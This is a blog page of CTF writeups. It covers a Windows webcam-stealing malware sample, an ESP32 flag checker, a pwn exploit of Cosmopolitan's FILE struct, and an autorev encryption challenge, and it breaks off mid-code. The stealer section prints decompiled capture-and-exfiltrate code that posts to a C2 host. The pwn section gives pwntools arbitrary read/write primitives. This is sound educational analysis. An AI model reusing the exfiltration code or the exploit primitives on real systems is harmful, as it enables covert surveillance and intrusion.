nothoudaifa

Stealerusk chall from Alpacahack B-Side writeup

nothoudaifa — Sun, 28 Jun 2026 00:00:00 +0000

this was a B-Side challenge released on Alpacahack, you can check it out here, it’s difficulty is Very Hard 7.0 .

TL;DR

reversing a windows malware that takes an image from the webcam and sends it to a C2 server.

Solve

we are given two files chal.exe and packet.pcap, i started by checking the pcap, it only contains a single POST request with some binary data as you can see here:

now opening the executable in ida we get this decompilation of the main function:

the first part gets the current directory path and compares it to another path using it’s rfid (rfid is a folder identifier in windows, you can check docs of the function to know more about it) if the comparision succeeds then it will execute the malware code.

the malware calls 2 functions sub_140001640 and sub_1400017B0.

sub_140001640:

__int64 sub_140001640()
{
 HWND hWnd; // [rsp+40h] [rbp-28h]
 int v2; // [rsp+48h] [rbp-20h]

 hWnd = capCreateCaptureWindowW(L"capture", 0, 0, 0, 640, 480, 0, 0);
 if ( !hWnd )
 return 1;
 if ( IsWindow(hWnd) )
 v2 = SendMessageW(hWnd, 0x40Au, 0, 0);
 else
 v2 = 0;
 if ( !v2 )
 return 1;
 Sleep(0x3E8u);
 SendMessageW(hWnd, 0x405u, 0, (LPARAM)handler);
 byte_140005114 = 0;
 if ( SendMessageW(hWnd, 0x43Du, 0, 0) )
 {
 Sleep(0x1F4u);
 if ( IsWindow(hWnd) )
 SendMessageW(hWnd, 0x40Bu, 0, 0);
 return 0;
 }
 else
 {
 if ( IsWindow(hWnd) )
 SendMessageW(hWnd, 0x40Bu, 0, 0);
 return 1;
 }
}

i haven’t fully reversed this function, but based on the documentation of capCreateCaptureWindowW, it creates a capture window which can be used to capture some data, it seems to configure it using SendMessageW one important thing is that it’s setting some kind of handler function handler, we will get to that later.

sub_1400017B0:

__int64 __fastcall sub_1400017B0(const void *a1, DWORD a2)
{
 void *hRequest; // [rsp+40h] [rbp-38h]
 unsigned int v4; // [rsp+48h] [rbp-30h]
 void *hConnect; // [rsp+50h] [rbp-28h]
 void *hSession; // [rsp+58h] [rbp-20h]
 DWORD dwNumberOfBytesWritten; // [rsp+60h] [rbp-18h] BYREF

 v4 = 0;
 hConnect = 0;
 hRequest = 0;
 hSession = WinHttpOpen(
 L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36",
 0,
 0,
 0,
 0);
 if ( hSession )
 {
 hConnect = WinHttpConnect(hSession, L"meccha-ayashii-server.internal", 0x50u, 0);
 if ( hConnect )
 {
 hRequest = WinHttpOpenRequest(hConnect, L"POST", L"/waiwai", 0, 0, 0, 0);
 if ( hRequest )
 {
 if ( WinHttpSendRequest(hRequest, L"Content-Type: application/octet-stream\r\n", 0xFFFFFFFF, 0, 0, a2, 0) )
 {
 dwNumberOfBytesWritten = 0;
 if ( WinHttpWriteData(hRequest, a1, a2, &dwNumberOfBytesWritten) )
 {
 if ( dwNumberOfBytesWritten == a2 )
 v4 = WinHttpReceiveResponse(hRequest, 0);
 }
 }
 }
 }
 }
 if ( hRequest )
 WinHttpCloseHandle(hRequest);
 if ( hConnect )
 WinHttpCloseHandle(hConnect);
 if ( hSession )
 WinHttpCloseHandle(hSession);
 return v4;
}

this function takes 2 global variables which are data buffer and size (which are used in the handler function too) and sends an http post request as we’ve seen in the pcap.

handler function:

following the code of the handler function we reach sub_140001100 which is called like this:

sub_140001100(a1, a2, (unsigned int)&unk_140005078, (unsigned int)&data_sent, (__int64)&data_sent_size);

you can check the function decompilation here

i guessed that a1 and a2 are data pointer and data size from their signature UCHAR *a1, ULONG a2, this function generates a random 0x10 value and uses it as iv and uses the third argument as key then it encrypts the capture data using aes-cbc, and then it puts the result in data_sent with the iv as the first 16 bytes.

decryption:

knowing this i made the following decryption function in python:

from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad


with open('./enc', 'rb') as f:
 data = f.read()
iv = data[:0x10] # iv is the first 0x10 bytes
data = data[0x10:] # rest is encrypted data


key = bytes.fromhex('9Dh, E7h, 5Ch, 29h, B5h, 07, 38h, 71h, 0Dh, 83h, 49h,39h, 73h, FDh, EBh, 9Ch'.replace(',','').replace('h','').replace(' ','')) # the key extracted from ida
print(key.hex())

cipher = AES.new(key, AES.MODE_CBC, iv)
plaintext = unpad(cipher.decrypt(data), AES.block_size)

open('dec', 'wb').write(plaintext)

running file on dec we see that it is an image:

$ file dec
dec: JPEG image data, baseline, precision 8, 1280x720, components 3

viewing it gives us the flag:

Extensif chall from ECSC 2026 writeup

nothoudaifa — Fri, 26 Jun 2026 00:00:00 +0000

you can check the challenge here, difficulty is 1 star.

TL;DR

reversing an esp32 app image that does basic flag checking

Solve

we are given a file extensif.bin running file on it gives us this:

$ file extensif.bin
extensif.bin: ESP-IDF application image for ESP32, project name: "extensif", version 1, compiled on Mar 24 2026 15:29:16, IDF version: v5.5.1, entry address: 0x400811E8

it is not an elf, googling ESP-IDF i find this github list which contains a lot of resources on esp32 reversing, i spent some time browsing it and trying different stuff until i came up against this ghidra extension, which is used to load esp32 flash dumps, using it i can load extensif.bin successfully into ghidra.

when first loading the binary i find my self in main which is not very helpfull since the main is not of the flag checker rather it is of whatever runs on esp32 when it boots (apparently it’s freertos, i grepped for it inside the binary), so to find the user code, i opened Windows->Defined Strings and searched for the flag format FCSC. i found this: getting the xrefs for this string i find my self at the function that appears to be the main user code


void UndefinedFunction_400d6000(void)
{
 code *pcVar1;
 undefined *puVar2;
 undefined *puVar3;
 int iVar4;
 int iVar5;
 char acStack_51 [33];
 byte abStack_30 [48];

 puVar2 = PTR_s_Bienvenue_400d0698;
 func_0x400d8590(puVar2);
 for (iVar5 = 0; iVar5 < 4; iVar5 = iVar5 + 1) {
 iVar4 = iVar5 * 4;
 puVar2 = PTR_DAT_400d069c;
 puVar2[iVar5 * 4] = 0x46;
 puVar2[iVar4 + 1] = 0x43;
 puVar2[iVar4 + 2] = 0x53;
 puVar2[iVar4 + 3] = 0x43;
 }
 func_0x400d60e4();
 for (iVar5 = 0; iVar5 < 0x10; iVar5 = iVar5 + 1) {
 puVar3 = PTR_BYTE_400d06a0;
 puVar2 = PTR_DAT_400d069c;
 abStack_30[iVar5] = puVar3[iVar5] ^ puVar2[iVar5];
 }
 puVar2 = PTR_s_Entrez_le_flag_(16_chars):_400d06a4;
 func_0x400d8438(puVar2);
 iVar5 = func_0x40088434();
 pcVar1 = (code *)PTR_fflush_400d06b8;
 (*pcVar1)(*(undefined4 *)(iVar5 + 8));
 iVar5 = func_0x40088434();
 iVar5 = func_0x400d8048(acStack_51 + 1,0x20,*(undefined4 *)(iVar5 + 4));
 if (iVar5 == 0) {
 puVar2 = PTR_s_Erreur_de_lecture_400d06a8; // -- (1)
 func_0x400d8590(puVar2);
 }
 else {
 pcVar1 = (code *)PTR_strlen_400d0660;
 iVar5 = (*pcVar1)(acStack_51 + 1);
 if (iVar5 != 0) {
 if (acStack_51[iVar5] == '\n') {
 acStack_51[iVar5] = '\0';
 iVar5 = iVar5 + -1;
 }
 if (iVar5 == 0x10) {
 pcVar1 = (code *)PTR_memcmp_400d067c;
 iVar5 = (*pcVar1)(acStack_51 + 1,abStack_30,0x10);
 if (iVar5 == 0) {
 func_0x400d8504(10);
 puVar2 = PTR_DAT_400d06b0;
 func_0x400d8438(puVar2,acStack_51 + 1);
 return;
 }
 puVar2 = PTR_s_[-]_Essaie_encore_400d06b4;
 func_0x400d8590(puVar2);
 return;
 }
 }
 puVar2 = PTR_s_[-]_Longueur_invalide._400d06ac;
 func_0x400d8590(puVar2);
 }
 return;
}

as you can see, it’s pretty bad decompilation, one reason for this is that the architecture of the esp32 Xtensa uses 24 or 16 bit instructions sizes which means you need more than one instruction to assgin an address to registers, so what the compiler does is it puts addresses into nearby memory locations so they can be addressed relatively (got this from here).

anyway, this program is reading a 0x10 long flag into acStack_51 + 1 and memcmp’ing it with abStack_30 so we just need to figure out what’s in it, i used error messages to figure out what it’s doing for example it’s trying to print the message PTR_s_Erreur_de_lecture_400d06a8 which obviously means the function before tries to read input.

the program tries to write the xor of PTR_BYTE_400d06a and PTR_DAT_400d069c into abStack_30 in here:

 for (iVar5 = 0; iVar5 < 0x10; iVar5 = iVar5 + 1) {
 puVar3 = PTR_BYTE_400d06a0;
 puVar2 = PTR_DAT_400d069c;
 abStack_30[iVar5] = puVar3[iVar5] ^ puVar2[iVar5];
 }

PTR_BYTE_400d06a0 is constant and PTR_DAT_400d069c is set just above it, first it’s set to b’FCSCFCSCFCSCFCSC’ using:

 for (iVar5 = 0; iVar5 < 4; iVar5 = iVar5 + 1) {
iVar4 = iVar5 * 4;
puVar2 = PTR_DAT_400d069c;
puVar2[iVar5 * 4] = 0x46;
puVar2[iVar4 + 1] = 0x43;
puVar2[iVar4 + 2] = 0x53;
puVar2[iVar4 + 3] = 0x43;
}

then the first 12 bytes are overwritten by the call to func_0x400d60e4

inspecting func_0x400d60e4 we see it’s decompilation and disassembly: it calls func_0x400d60f4 with 0x4a and PTR_DAT_400d069c here is the code for func_0x400d60f4 it writes the first argument into the first byte of the second argument and it writes the first byte of the return address into the second byte and incremnts the first arg by one and second arg by 2 and keeps calling it self recursively until arg1 & 8 == 0

getting the return addresses is easy, the return address is the address of the instrution after the call instruction, which means: for the first time when it’s called by func_0x400d60e4

 400d60ec 65 00 00 call8 SUB_400d60f4
here->400d60ef 1d f0 retw.n

we can see that it’s 0xef and for the rest it’s 0x08

 400d6105 e5 fe ff call8 SUB_400d60f4
LAB_400d6108 XREF[1]: 400d60f7(j)
here->400d6108 1d f0 retw.n

now tracing the execution of this function we can deduce that the final value of PTR_DAT_400d069c is: 0x4a,0xef, 0x4b, 0x8, 0x4c, 0x8, 0x4d, 0x8, 0x4e, 0x8, 0x4f, 0x8, 0x46, 0x43, 0x53, 0x43 and the extracted PTR_BYTE_400d06a0 is: 0x79, 0x8D, 0x2D, 0x3E, 0x2E, 0x6E, 0x79, 0x6D, 0x28, 0x38, 0x2D, 0x38, 0x77, 0x75, 0x60, 0x21

now we can get the final flag using this script:

data_400d069c = [0x4a,0xef, 0x4b, 0x8, 0x4c, 0x8, 0x4d, 0x8, 0x4e, 0x8, 0x4f, 0x8, 0x46, 0x43, 0x53, 0x43]
data_400d06a0 = [0x79, 0x8D, 0x2D, 0x3E, 0x2E, 0x6E, 0x79, 0x6D, 0x28, 0x38, 0x2D, 0x38, 0x77, 0x75, 0x60, 0x21]
r = []
for i in range(0x10):
 r.append(data_400d069c[i]^data_400d06a0[i])
print(b'FCSC{'+bytes(r)+b'}')

our final flag is : FCSC{3bf6bf4ef0b0163b}

writeup for pwn/cosmofile chall from l3akctf 2025

nothoudaifa — Mon, 14 Jul 2025 00:00:00 +0000

TL;DR

this challenge is about exploiting https://github.com/jart/cosmopolitan FILE struct implementation.

Initial Analysis

we are given cosmofile Dockerfile , using checksec on the binary we get:

[*] '/home/player/ctfs/l3ak/cosmofile/c/cosmofile'
 Arch: amd64-64-little
 RELRO: No RELRO
 Stack: No canary found
 NX: NX enabled
 PIE: No PIE (0x400000)
 Stripped: No
 Debuginfo: Yes

we can see that bsides NX, no security measure is enabled (which is good since we are exploiting it)

opening the binary in ida we get the following decompilation of the main function:

int __fastcall main(int argc, const char **argv, const char **envp)
{
 _BYTE buf[4100]; // [rsp+0h] [rbp-1010h] BYREF
 int v5; // [rsp+1004h] [rbp-Ch]
 FILE *f; // [rsp+1008h] [rbp-8h]

 f = fopen("/tmp/cosmofile.txt", "rw+");
 setbuf(stdout, 0LL);
 setbuf(stdin, 0LL);
 if ( f )
 {
 fwrite("Here is a secret of the universe:\n... huh?\n", 1uLL, 0x2BuLL, f);
 fwrite("It's not here...", 1uLL, 0x10uLL, f);
 fflush(f);
 rewind(f);
 while ( 1 )
 {
 while ( 1 )
 {
 while ( 1 )
 {
 menu();
 v5 = read_int();
 if ( v5 != (_DWORD)&unk_6E7472 )
 break;
 cosmo_puts("Whoa whoa whoa... you can't just hide the secret of the universe like that!");
 cosmo_puts("Just kidding, that's not really a secret...");
 read(0, f, 0x70uLL);
 }
 if ( v5 <= (int)&unk_6E7472 )
 break;
LABEL_12:
 cosmo_puts("Invalid choice. Please try again.");
 }
 if ( v5 != 1 )
 {
 if ( v5 == 2 )
 {
 cosmo_print("Exiting...\n");
 exit(0);
 }
 goto LABEL_12;
 }
 cosmo_print("Reading from cosmofile:\n");
 fread(buf, 1uLL, 0x1000uLL, f);
 cosmo_puts("Content of cosmofile:");
 write(1, buf, 0x1000uLL);
 cosmo_puts("\nNice, now you can see the universe in a different light!");
 }
 }
 perror("Failed to open file");
 return 1;
}

it starts by opening a file /tmp/cosmofile.txt and writing some data to it, then it gives us this menu:

[[ cosmofile ]]
1. Read a secret of the universe
2. Exit
>

option 1 allows us to read from the file and write the output to stdout and option 2 let’s us exit, but actually there is one more secret option, if ( v5 != (_DWORD)&unk_6E7472 ) if v5 is equal to 7238770 (0x6E7472 in decimal), we can write into the FILE struct.

Exploring the FILE struct implementation:

this is a typical FILE struct exploitation ctf chall, where we can write into the FILE struct and we have to exploit it’s inner workings to get arbitrary execution (in this case), it’s just that this is not glibc.

looking into the FILE struct definition in ida we see this:

00000000 struct FILE // sizeof=0x70
00000000 { // XREF: .data:__stdin/r
00000000 // .data:__stdout/r
00000000 char bufmode;
00000001 char freethis;
00000002 char freebuf;
00000003 char forking;
00000004 int oflags;
00000008 int state;
0000000C int fd;
00000010 int pid;
00000014 // padding byte
00000015 // padding byte
00000016 // padding byte
00000017 // padding byte
00000018 unsigned int size;
0000001C unsigned int beg;
00000020 unsigned int end;
00000024 // padding byte
00000025 // padding byte
00000026 // padding byte
00000027 // padding byte
00000028 char *buf;
00000030 pthread_mutex_t lock;
00000058 Dll elem; // XREF: stdin_init:loc_4019BE/o
00000058 // stdout_init+6/o ...
00000068 char *getln;
00000070 };

since there is no function pointers in it we will have to get arb read/write and write into the stack.

opening the fread function, we see that it claims the lock then, calls fread_unlocked (which is where the logic of fread resides), it’s full decompilation is here.

Getting arb read:

we can see at first it does some checks for overflow / file is readable … etc , then it has this piece of code which can be used to getting arb read:

v9 = count * (unsigned __int128)stride; // in our case v9 is (0x1000 * 1) = 0x1000
v13 = end - beg;
 if ( v13 >= (unsigned __int64)v9 )
 {
 nb = v9;
 memmove(buf, &f->buf[beg], v9);
 v32 = f->beg + nb;
 f->beg = v32;
 if ( v32 == f->end )
 *(_QWORD *)&f->beg = 0LL;
 return count;
 }

it checks if end - beg , which is the amount of data available in f->buf is bigger than how much fread wants, and if it is it just memmove’s the data from the f→buf to the user provided buffer (which will be written to stdout after fread finishes) then it returns, since we can control f→buf, we can get arb read using this.

here is a simple pwntools poc for getting arb read, our payload sets buf to the addr we want to read from and makes sure that end - beg is bigger than 0x1000, note that the payload is just the default values of the FILE struct with beg, end, size and addr replaced in, since they are the only values we want to change.

def arb_read(addr):
 sz = 0x1000
 beg = 0x0
 end = 0x1000
 payload = p64(0x0000024200010100)+p64(0x0000000300000000)+p64(0x0000000000000000)\
 +p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3\
 +p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

 write_to_FILE(payload)
 return call_fread()

Getting arb write:

the only way we can get arb write is if fread writes into the FILE struct buf, and that only happens in this part of the function:


 v9 = count * (unsigned __int128)stride;
 v11 = v9;
 if ( end != beg )
 {
 na = v11;
 buf = memmove(buf, &f->buf[beg], v13);
 fd = f->fd;
 v11 = na;
 }
 iov[0].iov_base = (char *)buf + v13;
 v15 = v11 - v13;
 iov[0].iov_len = v11 - v13;
 if ( f->bufmode == 2 || (size = f->size, v11 >= size) )
 {
 size = 0LL;
 v17 = 0LL;
 }
 else
 {
 v17 = f->buf;
 if ( (unsigned int)size > 0xC )
 size = (unsigned int)(size - 12);
 }
 iov[1].iov_base = v17;
 iov[1].iov_len = size;
 v18 = 2;
 v19 = iov;
 while ( 2 )
 {
 v35 = v15;
 v36 = v18;
 n = (size_t)v19;
 v20 = readv(fd, v19, v18);

we reach this part of the fread functions when f→buf does not have enough data to fulfill the the request of fread, so reads what’s left in f→buf and calls readv to read more data from the file into the user buffer, and in the way it also read’s in f->buf f->size-0xc bytes, we can use this in addition to changing the f->fd to 0 (stdin), so we can get arb write from stdin, here is a simple pwntools poc that shows how it’s done:

def get_write(addr, data):
 sz = 0x1001 // size needs to be strictly bigger than what the user wants
 beg = 0x0
 end = 0x0
 payload = p64(0x0000024200010100)+p64(0x0000000000000000)+p64(0x0000000000000000)\
 +p32(sz)+p32(beg)+p32(end)+p32(0x0)+p64(addr)+p64(0x0)+p64(0x2)+p64(0x0)*3\
 +p64(0x000000000042f338)+ p64(0x000000000042f3d8)+p64(0x0000000000000000)

 write_to_FILE(payload)

 p.sendlineafter(b'>', b'1') // call fread
 // after this it will read from stdin
 pay = b'a'*(0x1000) // send 0x1000 bytes for the user buffer
 pay += data // the rest will be read into f->buf
 pay = pay + b'c'*(0x1000+4085-len(pay)) // readv will continue reading until it gets all the bytes it requests, so we add this dummy data
 p.send(pay)

Exploitation:

now that we have both arb_read and arb_write, we can just get a stack addr from the binary memory and write into the return address of fread (because we can’t write into the ret of main, since it exits).

we can get a stack leak by reading the value at &__argv and then subtract the offset for the return address of fread, after that we just write our rop chain, apparently there are no binaries inside the jail of the docker container, so we have to read the flag.txt directly using the rop chain.

the final exploit is here.

running it gives us the flag : L3AK{JU57_b3c4u43_7H3R3_15_N0_vft4bl3_D035N7_m34n_Y0U_5h0uld_61V3_up}

writeup for rev/r3loads chall from r3ctf 2025

nothoudaifa — Tue, 08 Jul 2025 00:00:00 +0000

points: 929 pts
solves: 11 solves

this weekend i played r3ctf, i solved this challenge with @aymenmog, i really enjoyed doing this autorev, so i decided to make this writeup.

Initial analysis

this is an autorev chall, we are given 11423 executables each one is in it’s directory along with a set of shared libraries, the readme says that each binary takes 8 bytes input and final output of the chall will be a jpg which is the concatenation of 11423 right inputs.

each part is like this:

player@notarch:~/ctfs/r3/r3loads/game/300$ ls
beatme RRRRRRRRRRRR3R33RRRR3R3R3R3RRR33.so RRRRRRRRRRRR3R33RRRRRRRRRRR33333.so RRRRRRRRRRRR3R3R33333RR3R33333RR.so
RRRRRRRRRRRR3R33RRR3R3RRRR333RRR.so RRRRRRRRRRRR3R33RRRR3R3R3R3RRRR3.so RRRRRRRRRRRR3R33RRRRRRRRRRR333R3.so RRRRRRRRRRRR3R3R33333RR3R3333R3R.so
RRRRRRRRRRRR3R33RRR3R3RRRR33R33R.so RRRRRRRRRRRR3R33RRRRR33R3R33333R.so RRRRRRRRRRRR3R33RRRRRRRRRRR33R33.so RRRRRRRRRRRR3R3R33333RR3R3333RRR.so
RRRRRRRRRRRR3R33RRR3R3RRRR33R3RR.so RRRRRRRRRRRR3R33RRRRR33R3R3333RR.so RRRRRRRRRRRR3R33RRRRRRRRRRR33RR3.so RRRRRRRRRRRR3R3R33333RR3R333R33R.so
RRRRRRRRRRRR3R33RRRR33333R33RRR3.so RRRRRRRRRRRR3R33RRRRR33R3R333R3R.so RRRRRRRRRRRR3R33RRRRRRRRRRR3R333.so RRRRRRRRRRRR3R3R3333R3R33RRR333R.so
RRRRRRRRRRRR3R33RRRR33333R3R3333.so RRRRRRRRRRRR3R33RRRRR33R3R333RRR.so RRRRRRRRRRRR3R33RRRRRRRRRRR3R3R3.so RRRRRRRRRRRR3R3R3333R3R33RRR33RR.so
RRRRRRRRRRRR3R33RRRR33333R3R33R3.so RRRRRRRRRRRR3R33RRRRR33R3R33R33R.so RRRRRRRRRRRR3R3R3333333RRR33RRR3.so RRRRRRRRRRRR3R3R3333R3R33RRR3R3R.so
RRRRRRRRRRRR3R33RRRR33333R3R3R33.so RRRRRRRRRRRR3R33RRRRR33R3R33R3RR.so RRRRRRRRRRRR3R3R3333333RRR3R3333.so RRRRRRRRRRRR3R3R3333R3R33RRR3RRR.so
RRRRRRRRRRRR3R33RRRR33333R3R3RR3.so RRRRRRRRRRRR3R33RRRRRR333333R333.so RRRRRRRRRRRR3R3R3333333RRR3R33R3.so RRRRRRRRRRRR3R3R3333R3R33RRRR33R.so
RRRRRRRRRRRR3R33RRRR3R3R3R3RR3R3.so RRRRRRRRRRRR3R33RRRRRR333333R3R3.so RRRRRRRRRRRR3R3R3333333RRR3R3R33.so RRRRRRRRRRRR3R3R3333RR3RR33RRRRR.so

running it gives us:

player@notarch:~/ctfs/r3/r3loads/game/300$ ./beatme
Weclome to r3ctf 2025, can you beat me? 300/11423
Input something:
aaaabbbb
Try again!

we will first starting by reversing a binary, then see what we can automate and script it.

the “rev” part:

loading one executable in ida we get this (variable declarations removed for clarity), this main function can be separated into 3 parts:

Part 1 of main: loading the functions

the first thing it does is load 10 functions (which will be used later) from the dynamic libraries in the same directory, it uses dlopen to load the library and dlsym to get the function from it, i will show how i got what one function does:

handlee = dlopen("./RRRRRRRRRRRRRRRRRRR33RRR33R3RRRR.so", 1);
 if ( !handlee )
 exit(1);
 dlerror();
 qword_7048 = dlsym(handlee, "RRRRRRRRRRRRRRRRRRR33RRR33R3RRR3");

opening this function in binja we get the following:

it loads another function from another library and calls it, while only operating on arg3.

it seems that it keeps doing this a few times until it reaches the last function which defines the operation.

the path (in this case it only calls dlsym one time):

we can see in the end it returns arg1 - arg2, and also it does not use the third argument, this actually is the case for all the other functions, arg3 is never used, it is likely used as an obfuscation mechanism so we can ignore it.

the functions in order are (note that all arguments and returns are unsigned ints):

xor_first_two => arg1 ^ arg2
read_integer_at_offset => ((unsigned int*)arg1)[arg2]
add_at_arg1_arg2 => *((unsigned int*)arg1) += arg2
and_arg1_arg2 => arg1 & arg2
add_arg1_arg2 => arg1 + arg2
subtract_arg1_arg2 => arg1 - arg2
mult_arg1_arg2 => arg1 * arg2
or_arg1_arg2 => arg1 | arg2
integer_div_arg1_arg2 => arg1 / arg2
bitwise_not => ~arg1

after reversing all functions and renaming them we move to the second part.

Part 2 of main: Setting the key

it’s code after renaming the functions is accessible here, the first thing i noticed about this part is that it is all just operations on constants, it seems to be writing four unsigned ints in v91, we can extract it using gdb by setting a breakpoint just before the call to sub_1630, then inspecting the memory at rsi.

Part 3 of main: Handling input

puts("Weclome to r3ctf 2025, can you beat me? 1/11423");
 puts("Input something: ");
 buf = 0LL;
 read(0, &buf, 8uLL);
 sub_1630((unsigned int *)&buf, v91);
 if ( buf == 0xF06203EC3D2C5B74LL )
 puts("You win!");
 else
 puts("Try again!");

this part read 8 bytes, then calls sub_1630 on it with v91 which is constant and likely used as a key to some encryption on buf.

reversing the encryption function:

the encrypt function decompilation is here, it seems very scary, but we will go at it bit by bit till we understand it.

at first, it takes our 8 bytes input and splits it into two unsigned ints, first and second, then it sets S a State array (similar to rc4) using the key (this array is only read from), then it loops 0x478 times while doing some operations on first and second, in the end it writes them back to our input.

now before i started reversing this function, i noticed that there are four regions of code that only use constant values, i marked them on the code above, here is an example one:

v162 = mult_arg1_arg2;
 v159 = and_arg1_arg2;
 v154 = add_arg1_arg2(3879220815LL, 1303544047LL, 1673289997LL);
 v148 = or_arg1_arg2(119385303LL, 3231329148LL, 141954786LL);
 v145 = bitwise_not;
 v137 = and_arg1_arg2(1503872738LL, 978965565LL, 1470160614LL);
 v125 = mult_arg1_arg2(761654413LL, 3043887596LL, 4085454309LL);
 v120 = mult_arg1_arg2;
 v131 = xor_first_two(3333670936LL, 2147831941LL, 2217132274LL);
 v115 = add_arg1_arg2(4141055499LL, 1038626365LL, 1517838417LL);
 v112 = xor_first_two;
 v109 = add_arg1_arg2(2686461105LL, 3867813406LL, 686930351LL);
 v106 = xor_first_two(3259940977LL, 1820144441LL, 2738368048LL);
 v103 = mult_arg1_arg2;
 v2 = bitwise_not(2920661428LL, 408102610LL, 758347707LL);
 v3 = xor_first_two(2688446990LL, 3924691225LL, 3780184521LL);
 v4 = or_arg1_arg2;
 v5 = xor_first_two(715168552LL, 4203380807LL, 4042894304LL);
 v6 = and_arg1_arg2(3362982059LL, 1951226027LL, 2091265364LL);
 v7 = mult_arg1_arg2(2447727191LL, 4231433857LL, 2356928693LL);
 v8 = v4(v7, v6, v5);
 v9 = v103(v8, v3, v2);
 v10 = v112(v9, v106, v109);
 v11 = v120(v10, v115, v131);
 v12 = v145(v11, v125, v137);
 LODWORD(v159) = v159(v12, v148, v154);
 v155 = mult_arg1_arg2;
 v149 = integer_div_arg1_arg2;
 v146 = and_arg1_arg2;
 v138 = add_arg1_arg2(3879220815LL, 1303544047LL, 1673289997LL);
 v126 = or_arg1_arg2(119385303LL, 3231329148LL, 141954786LL);
 v121 = bitwise_not;
 v132 = and_arg1_arg2(1503872738LL, 978965565LL, 1470160614LL);
 v116 = mult_arg1_arg2(761654413LL, 3043887596LL, 4085454309LL);
 v113 = mult_arg1_arg2;
 v110 = xor_first_two(3333670936LL, 2147831941LL, 2217132274LL);
 v107 = add_arg1_arg2(4141055499LL, 1038626365LL, 1517838417LL);
 v104 = xor_first_two;
 v102 = add_arg1_arg2(2686461105LL, 3867813406LL, 686930351LL);
 v101 = xor_first_two(3259940977LL, 1820144441LL, 2738368048LL);
 v100 = mult_arg1_arg2;
 v13 = bitwise_not(2920661428LL, 408102610LL, 758347707LL);
 v14 = xor_first_two(2688446990LL, 3924691225LL, 3780184521LL);
 v15 = or_arg1_arg2;
 v16 = xor_first_two(715168552LL, 4203380807LL, 4042894304LL);
 v17 = and_arg1_arg2(3362982059LL, 1951226027LL, 2091265364LL);
 v18 = mult_arg1_arg2(2447727191LL, 4231433857LL, 2356928693LL);
 v19 = v15(v18, v17, v16);
 v20 = v100(v19, v14, v13);
 v21 = v104(v20, v101, v102);
 v22 = v113(v21, v107, v110);
 v23 = v121(v22, v116, v132);
 v24 = v146(v23, v126, v138);
 v25 = v149(v24, 7LL, 1501804614LL);
 v26 = v155(v25, 7LL, 3199106012LL);
 v27 = pow(2LL, (unsigned int)((_DWORD)v159 - v26 + 1), 3474473344LL);

it basically does some operations then calls pow(2, result) (third arg of pow is not used), then the rest of the logic uses it’s result for calculations, this pattern repeats four times inside the loop, we can replace those regions by their final results in the decompilation to simplify it.

to get this four constants i used gdb with dprintf (setting the breakpoint at the final instruction before pow returns) to print the return value of pow.

dprintf *0x162E+0x555555554000, "rax = 0x%02x\n", $rax

we get these values

rax = 0x08
rax = 0x08
rax = 0x20
rax = 0x10
rax = 0x08
rax = 0x08
rax = 0x20
rax = 0x10

and sure enough, these four values kept repeating, meaning my observation was right, now putting them inside the loop gives us the following:

do
 {
 v172 = v168 & 3LL;
 v27 = 0x8; // static 1 output
 v173 = second * v27
 v47 = 0x8; // static 2 output
 v174 = second / v47;
 v175 = S[v172];
 v175 = v175+v168;
 v176 = v173^v174;
 v176 = v176+second;
 v51 = ~v175;
 v29 = v51 & v176;
 v53 = ~v176;
 v54 = v53 & v175;
 v55 = v54 | v29;
 first += v55;

 v72 =0x20; // static 3 output
 v177 = first / v72;
 v88 = 0x10; // static 4 output
 v178 = first * v88;
 v91 = ~v177;
 v80 = v91 & v178;
 v93 = ~v178;
 v94 = v93 & v177;
 v179 = v94 | v80;
 v168 += 3284565212;
 v180 = v179 + first;
 v96 = v168 / 0x800LL;
 v181 = 255LL & v96;
 v182 = S[v181]
 v183 = v182 + v168;
 v98 = v180 ^ v183;
 second += v98;
 v185 += 1uLL;
 }
 while ( 0x478 >= v185 );

now as you can see, this is pretty good c decompilation, i can reverse it but i still used llm to turn it into a more simplified c version, so i can use it for scripting, the four static constants are used for multiplication and division, and since they are powers of 2, they are simplified to right and left shifts. it is also using v168 to index into the state array, which is incremented by a constant value 0x9D175C01 (note that the addition overflows, and the result will be cut to fit 32bits).

uint64_t enc(uint32_t *input, uint32_t *key) {
 uint32_t S[256];
 uint32_t first = input[0];
 uint32_t second = input[1];
 uint32_t v168 = 0;
 uint64_t v185 = 0;

 // Initialize S-box
 for (int i = 0; i <= 255; ++i)
 S[i] = i;

 // RC4-style key scheduling
 uint32_t v170 = 0, v171 = 0;
 for (int i = 0; i <= 255; ++i) {
 uint32_t v184 = S[i];
 v170 = (v184 + v170 + key[v171]) & 0xFF;
 uint32_t tmp = S[i];
 S[i] = S[v170];
 S[v170] = tmp;

 if (++v171 > 3)
 v171 = 0;
 }

 do {
 uint32_t v172 = v168 & 3; // 7. we can get this after decrementig v168 by the constant
 uint32_t v175 = (S[v172] + v168); // 8. obviously we got this
 uint32_t v176 = ((second << 3) ^ (second >> 3)) + second; // 9. this is using the second before encrypting it, which we decrypted in step 6
 first += v175 ^ v176; // 10. this we can get since.

 // Second part operations
 uint32_t v179 = (first >> 5) ^ (first << 4); // 5. v179 we have since it's using the first after it is incremented (it's using the encrypted first)
 v168 += 0x9D175C01U; // Constant increment
 uint32_t v180 = v179 + first; // 6. since we have this we can get the decrypted value of second (by subtracting the xor result)

 // Final operations
 uint32_t v181 = (v168 >> 11) & 0xFF; // 2. we have this value since we have v168
 uint32_t v183 = S[v181] + v168; // 3. this too since we just calculated v181
 second += v180 ^ v183; // 4. to get this we need v180

 v185 += 1;
 } while (v185 <= 0x478);

 // 1. we start here, where we have first and second and the last value of v168

 input[0] = first;
 input[1] = second;

}

now our task is to reverse this function, i have written my line of thought for reversing it’s operations as comments in the code above, follow steps 1 to 10.

here is the final decryption script:

uint64_t dec(uint32_t first, uint32_t second, uint32_t *key, uint32_t* output) {
 uint32_t S[256];
 uint32_t v168 = 0;
 uint64_t v185 = 0;

 // Initialize S-box
 for (int i = 0; i <= 255; ++i)
 S[i] = i;

 // RC4-style key scheduling
 uint32_t v170 = 0, v171 = 0;
 for (int i = 0; i <= 255; ++i) {
 uint32_t v184 = S[i];
 v170 = (v184 + v170 + key[v171]) & 0xFF;
 uint32_t tmp = S[i];
 S[i] = S[v170];
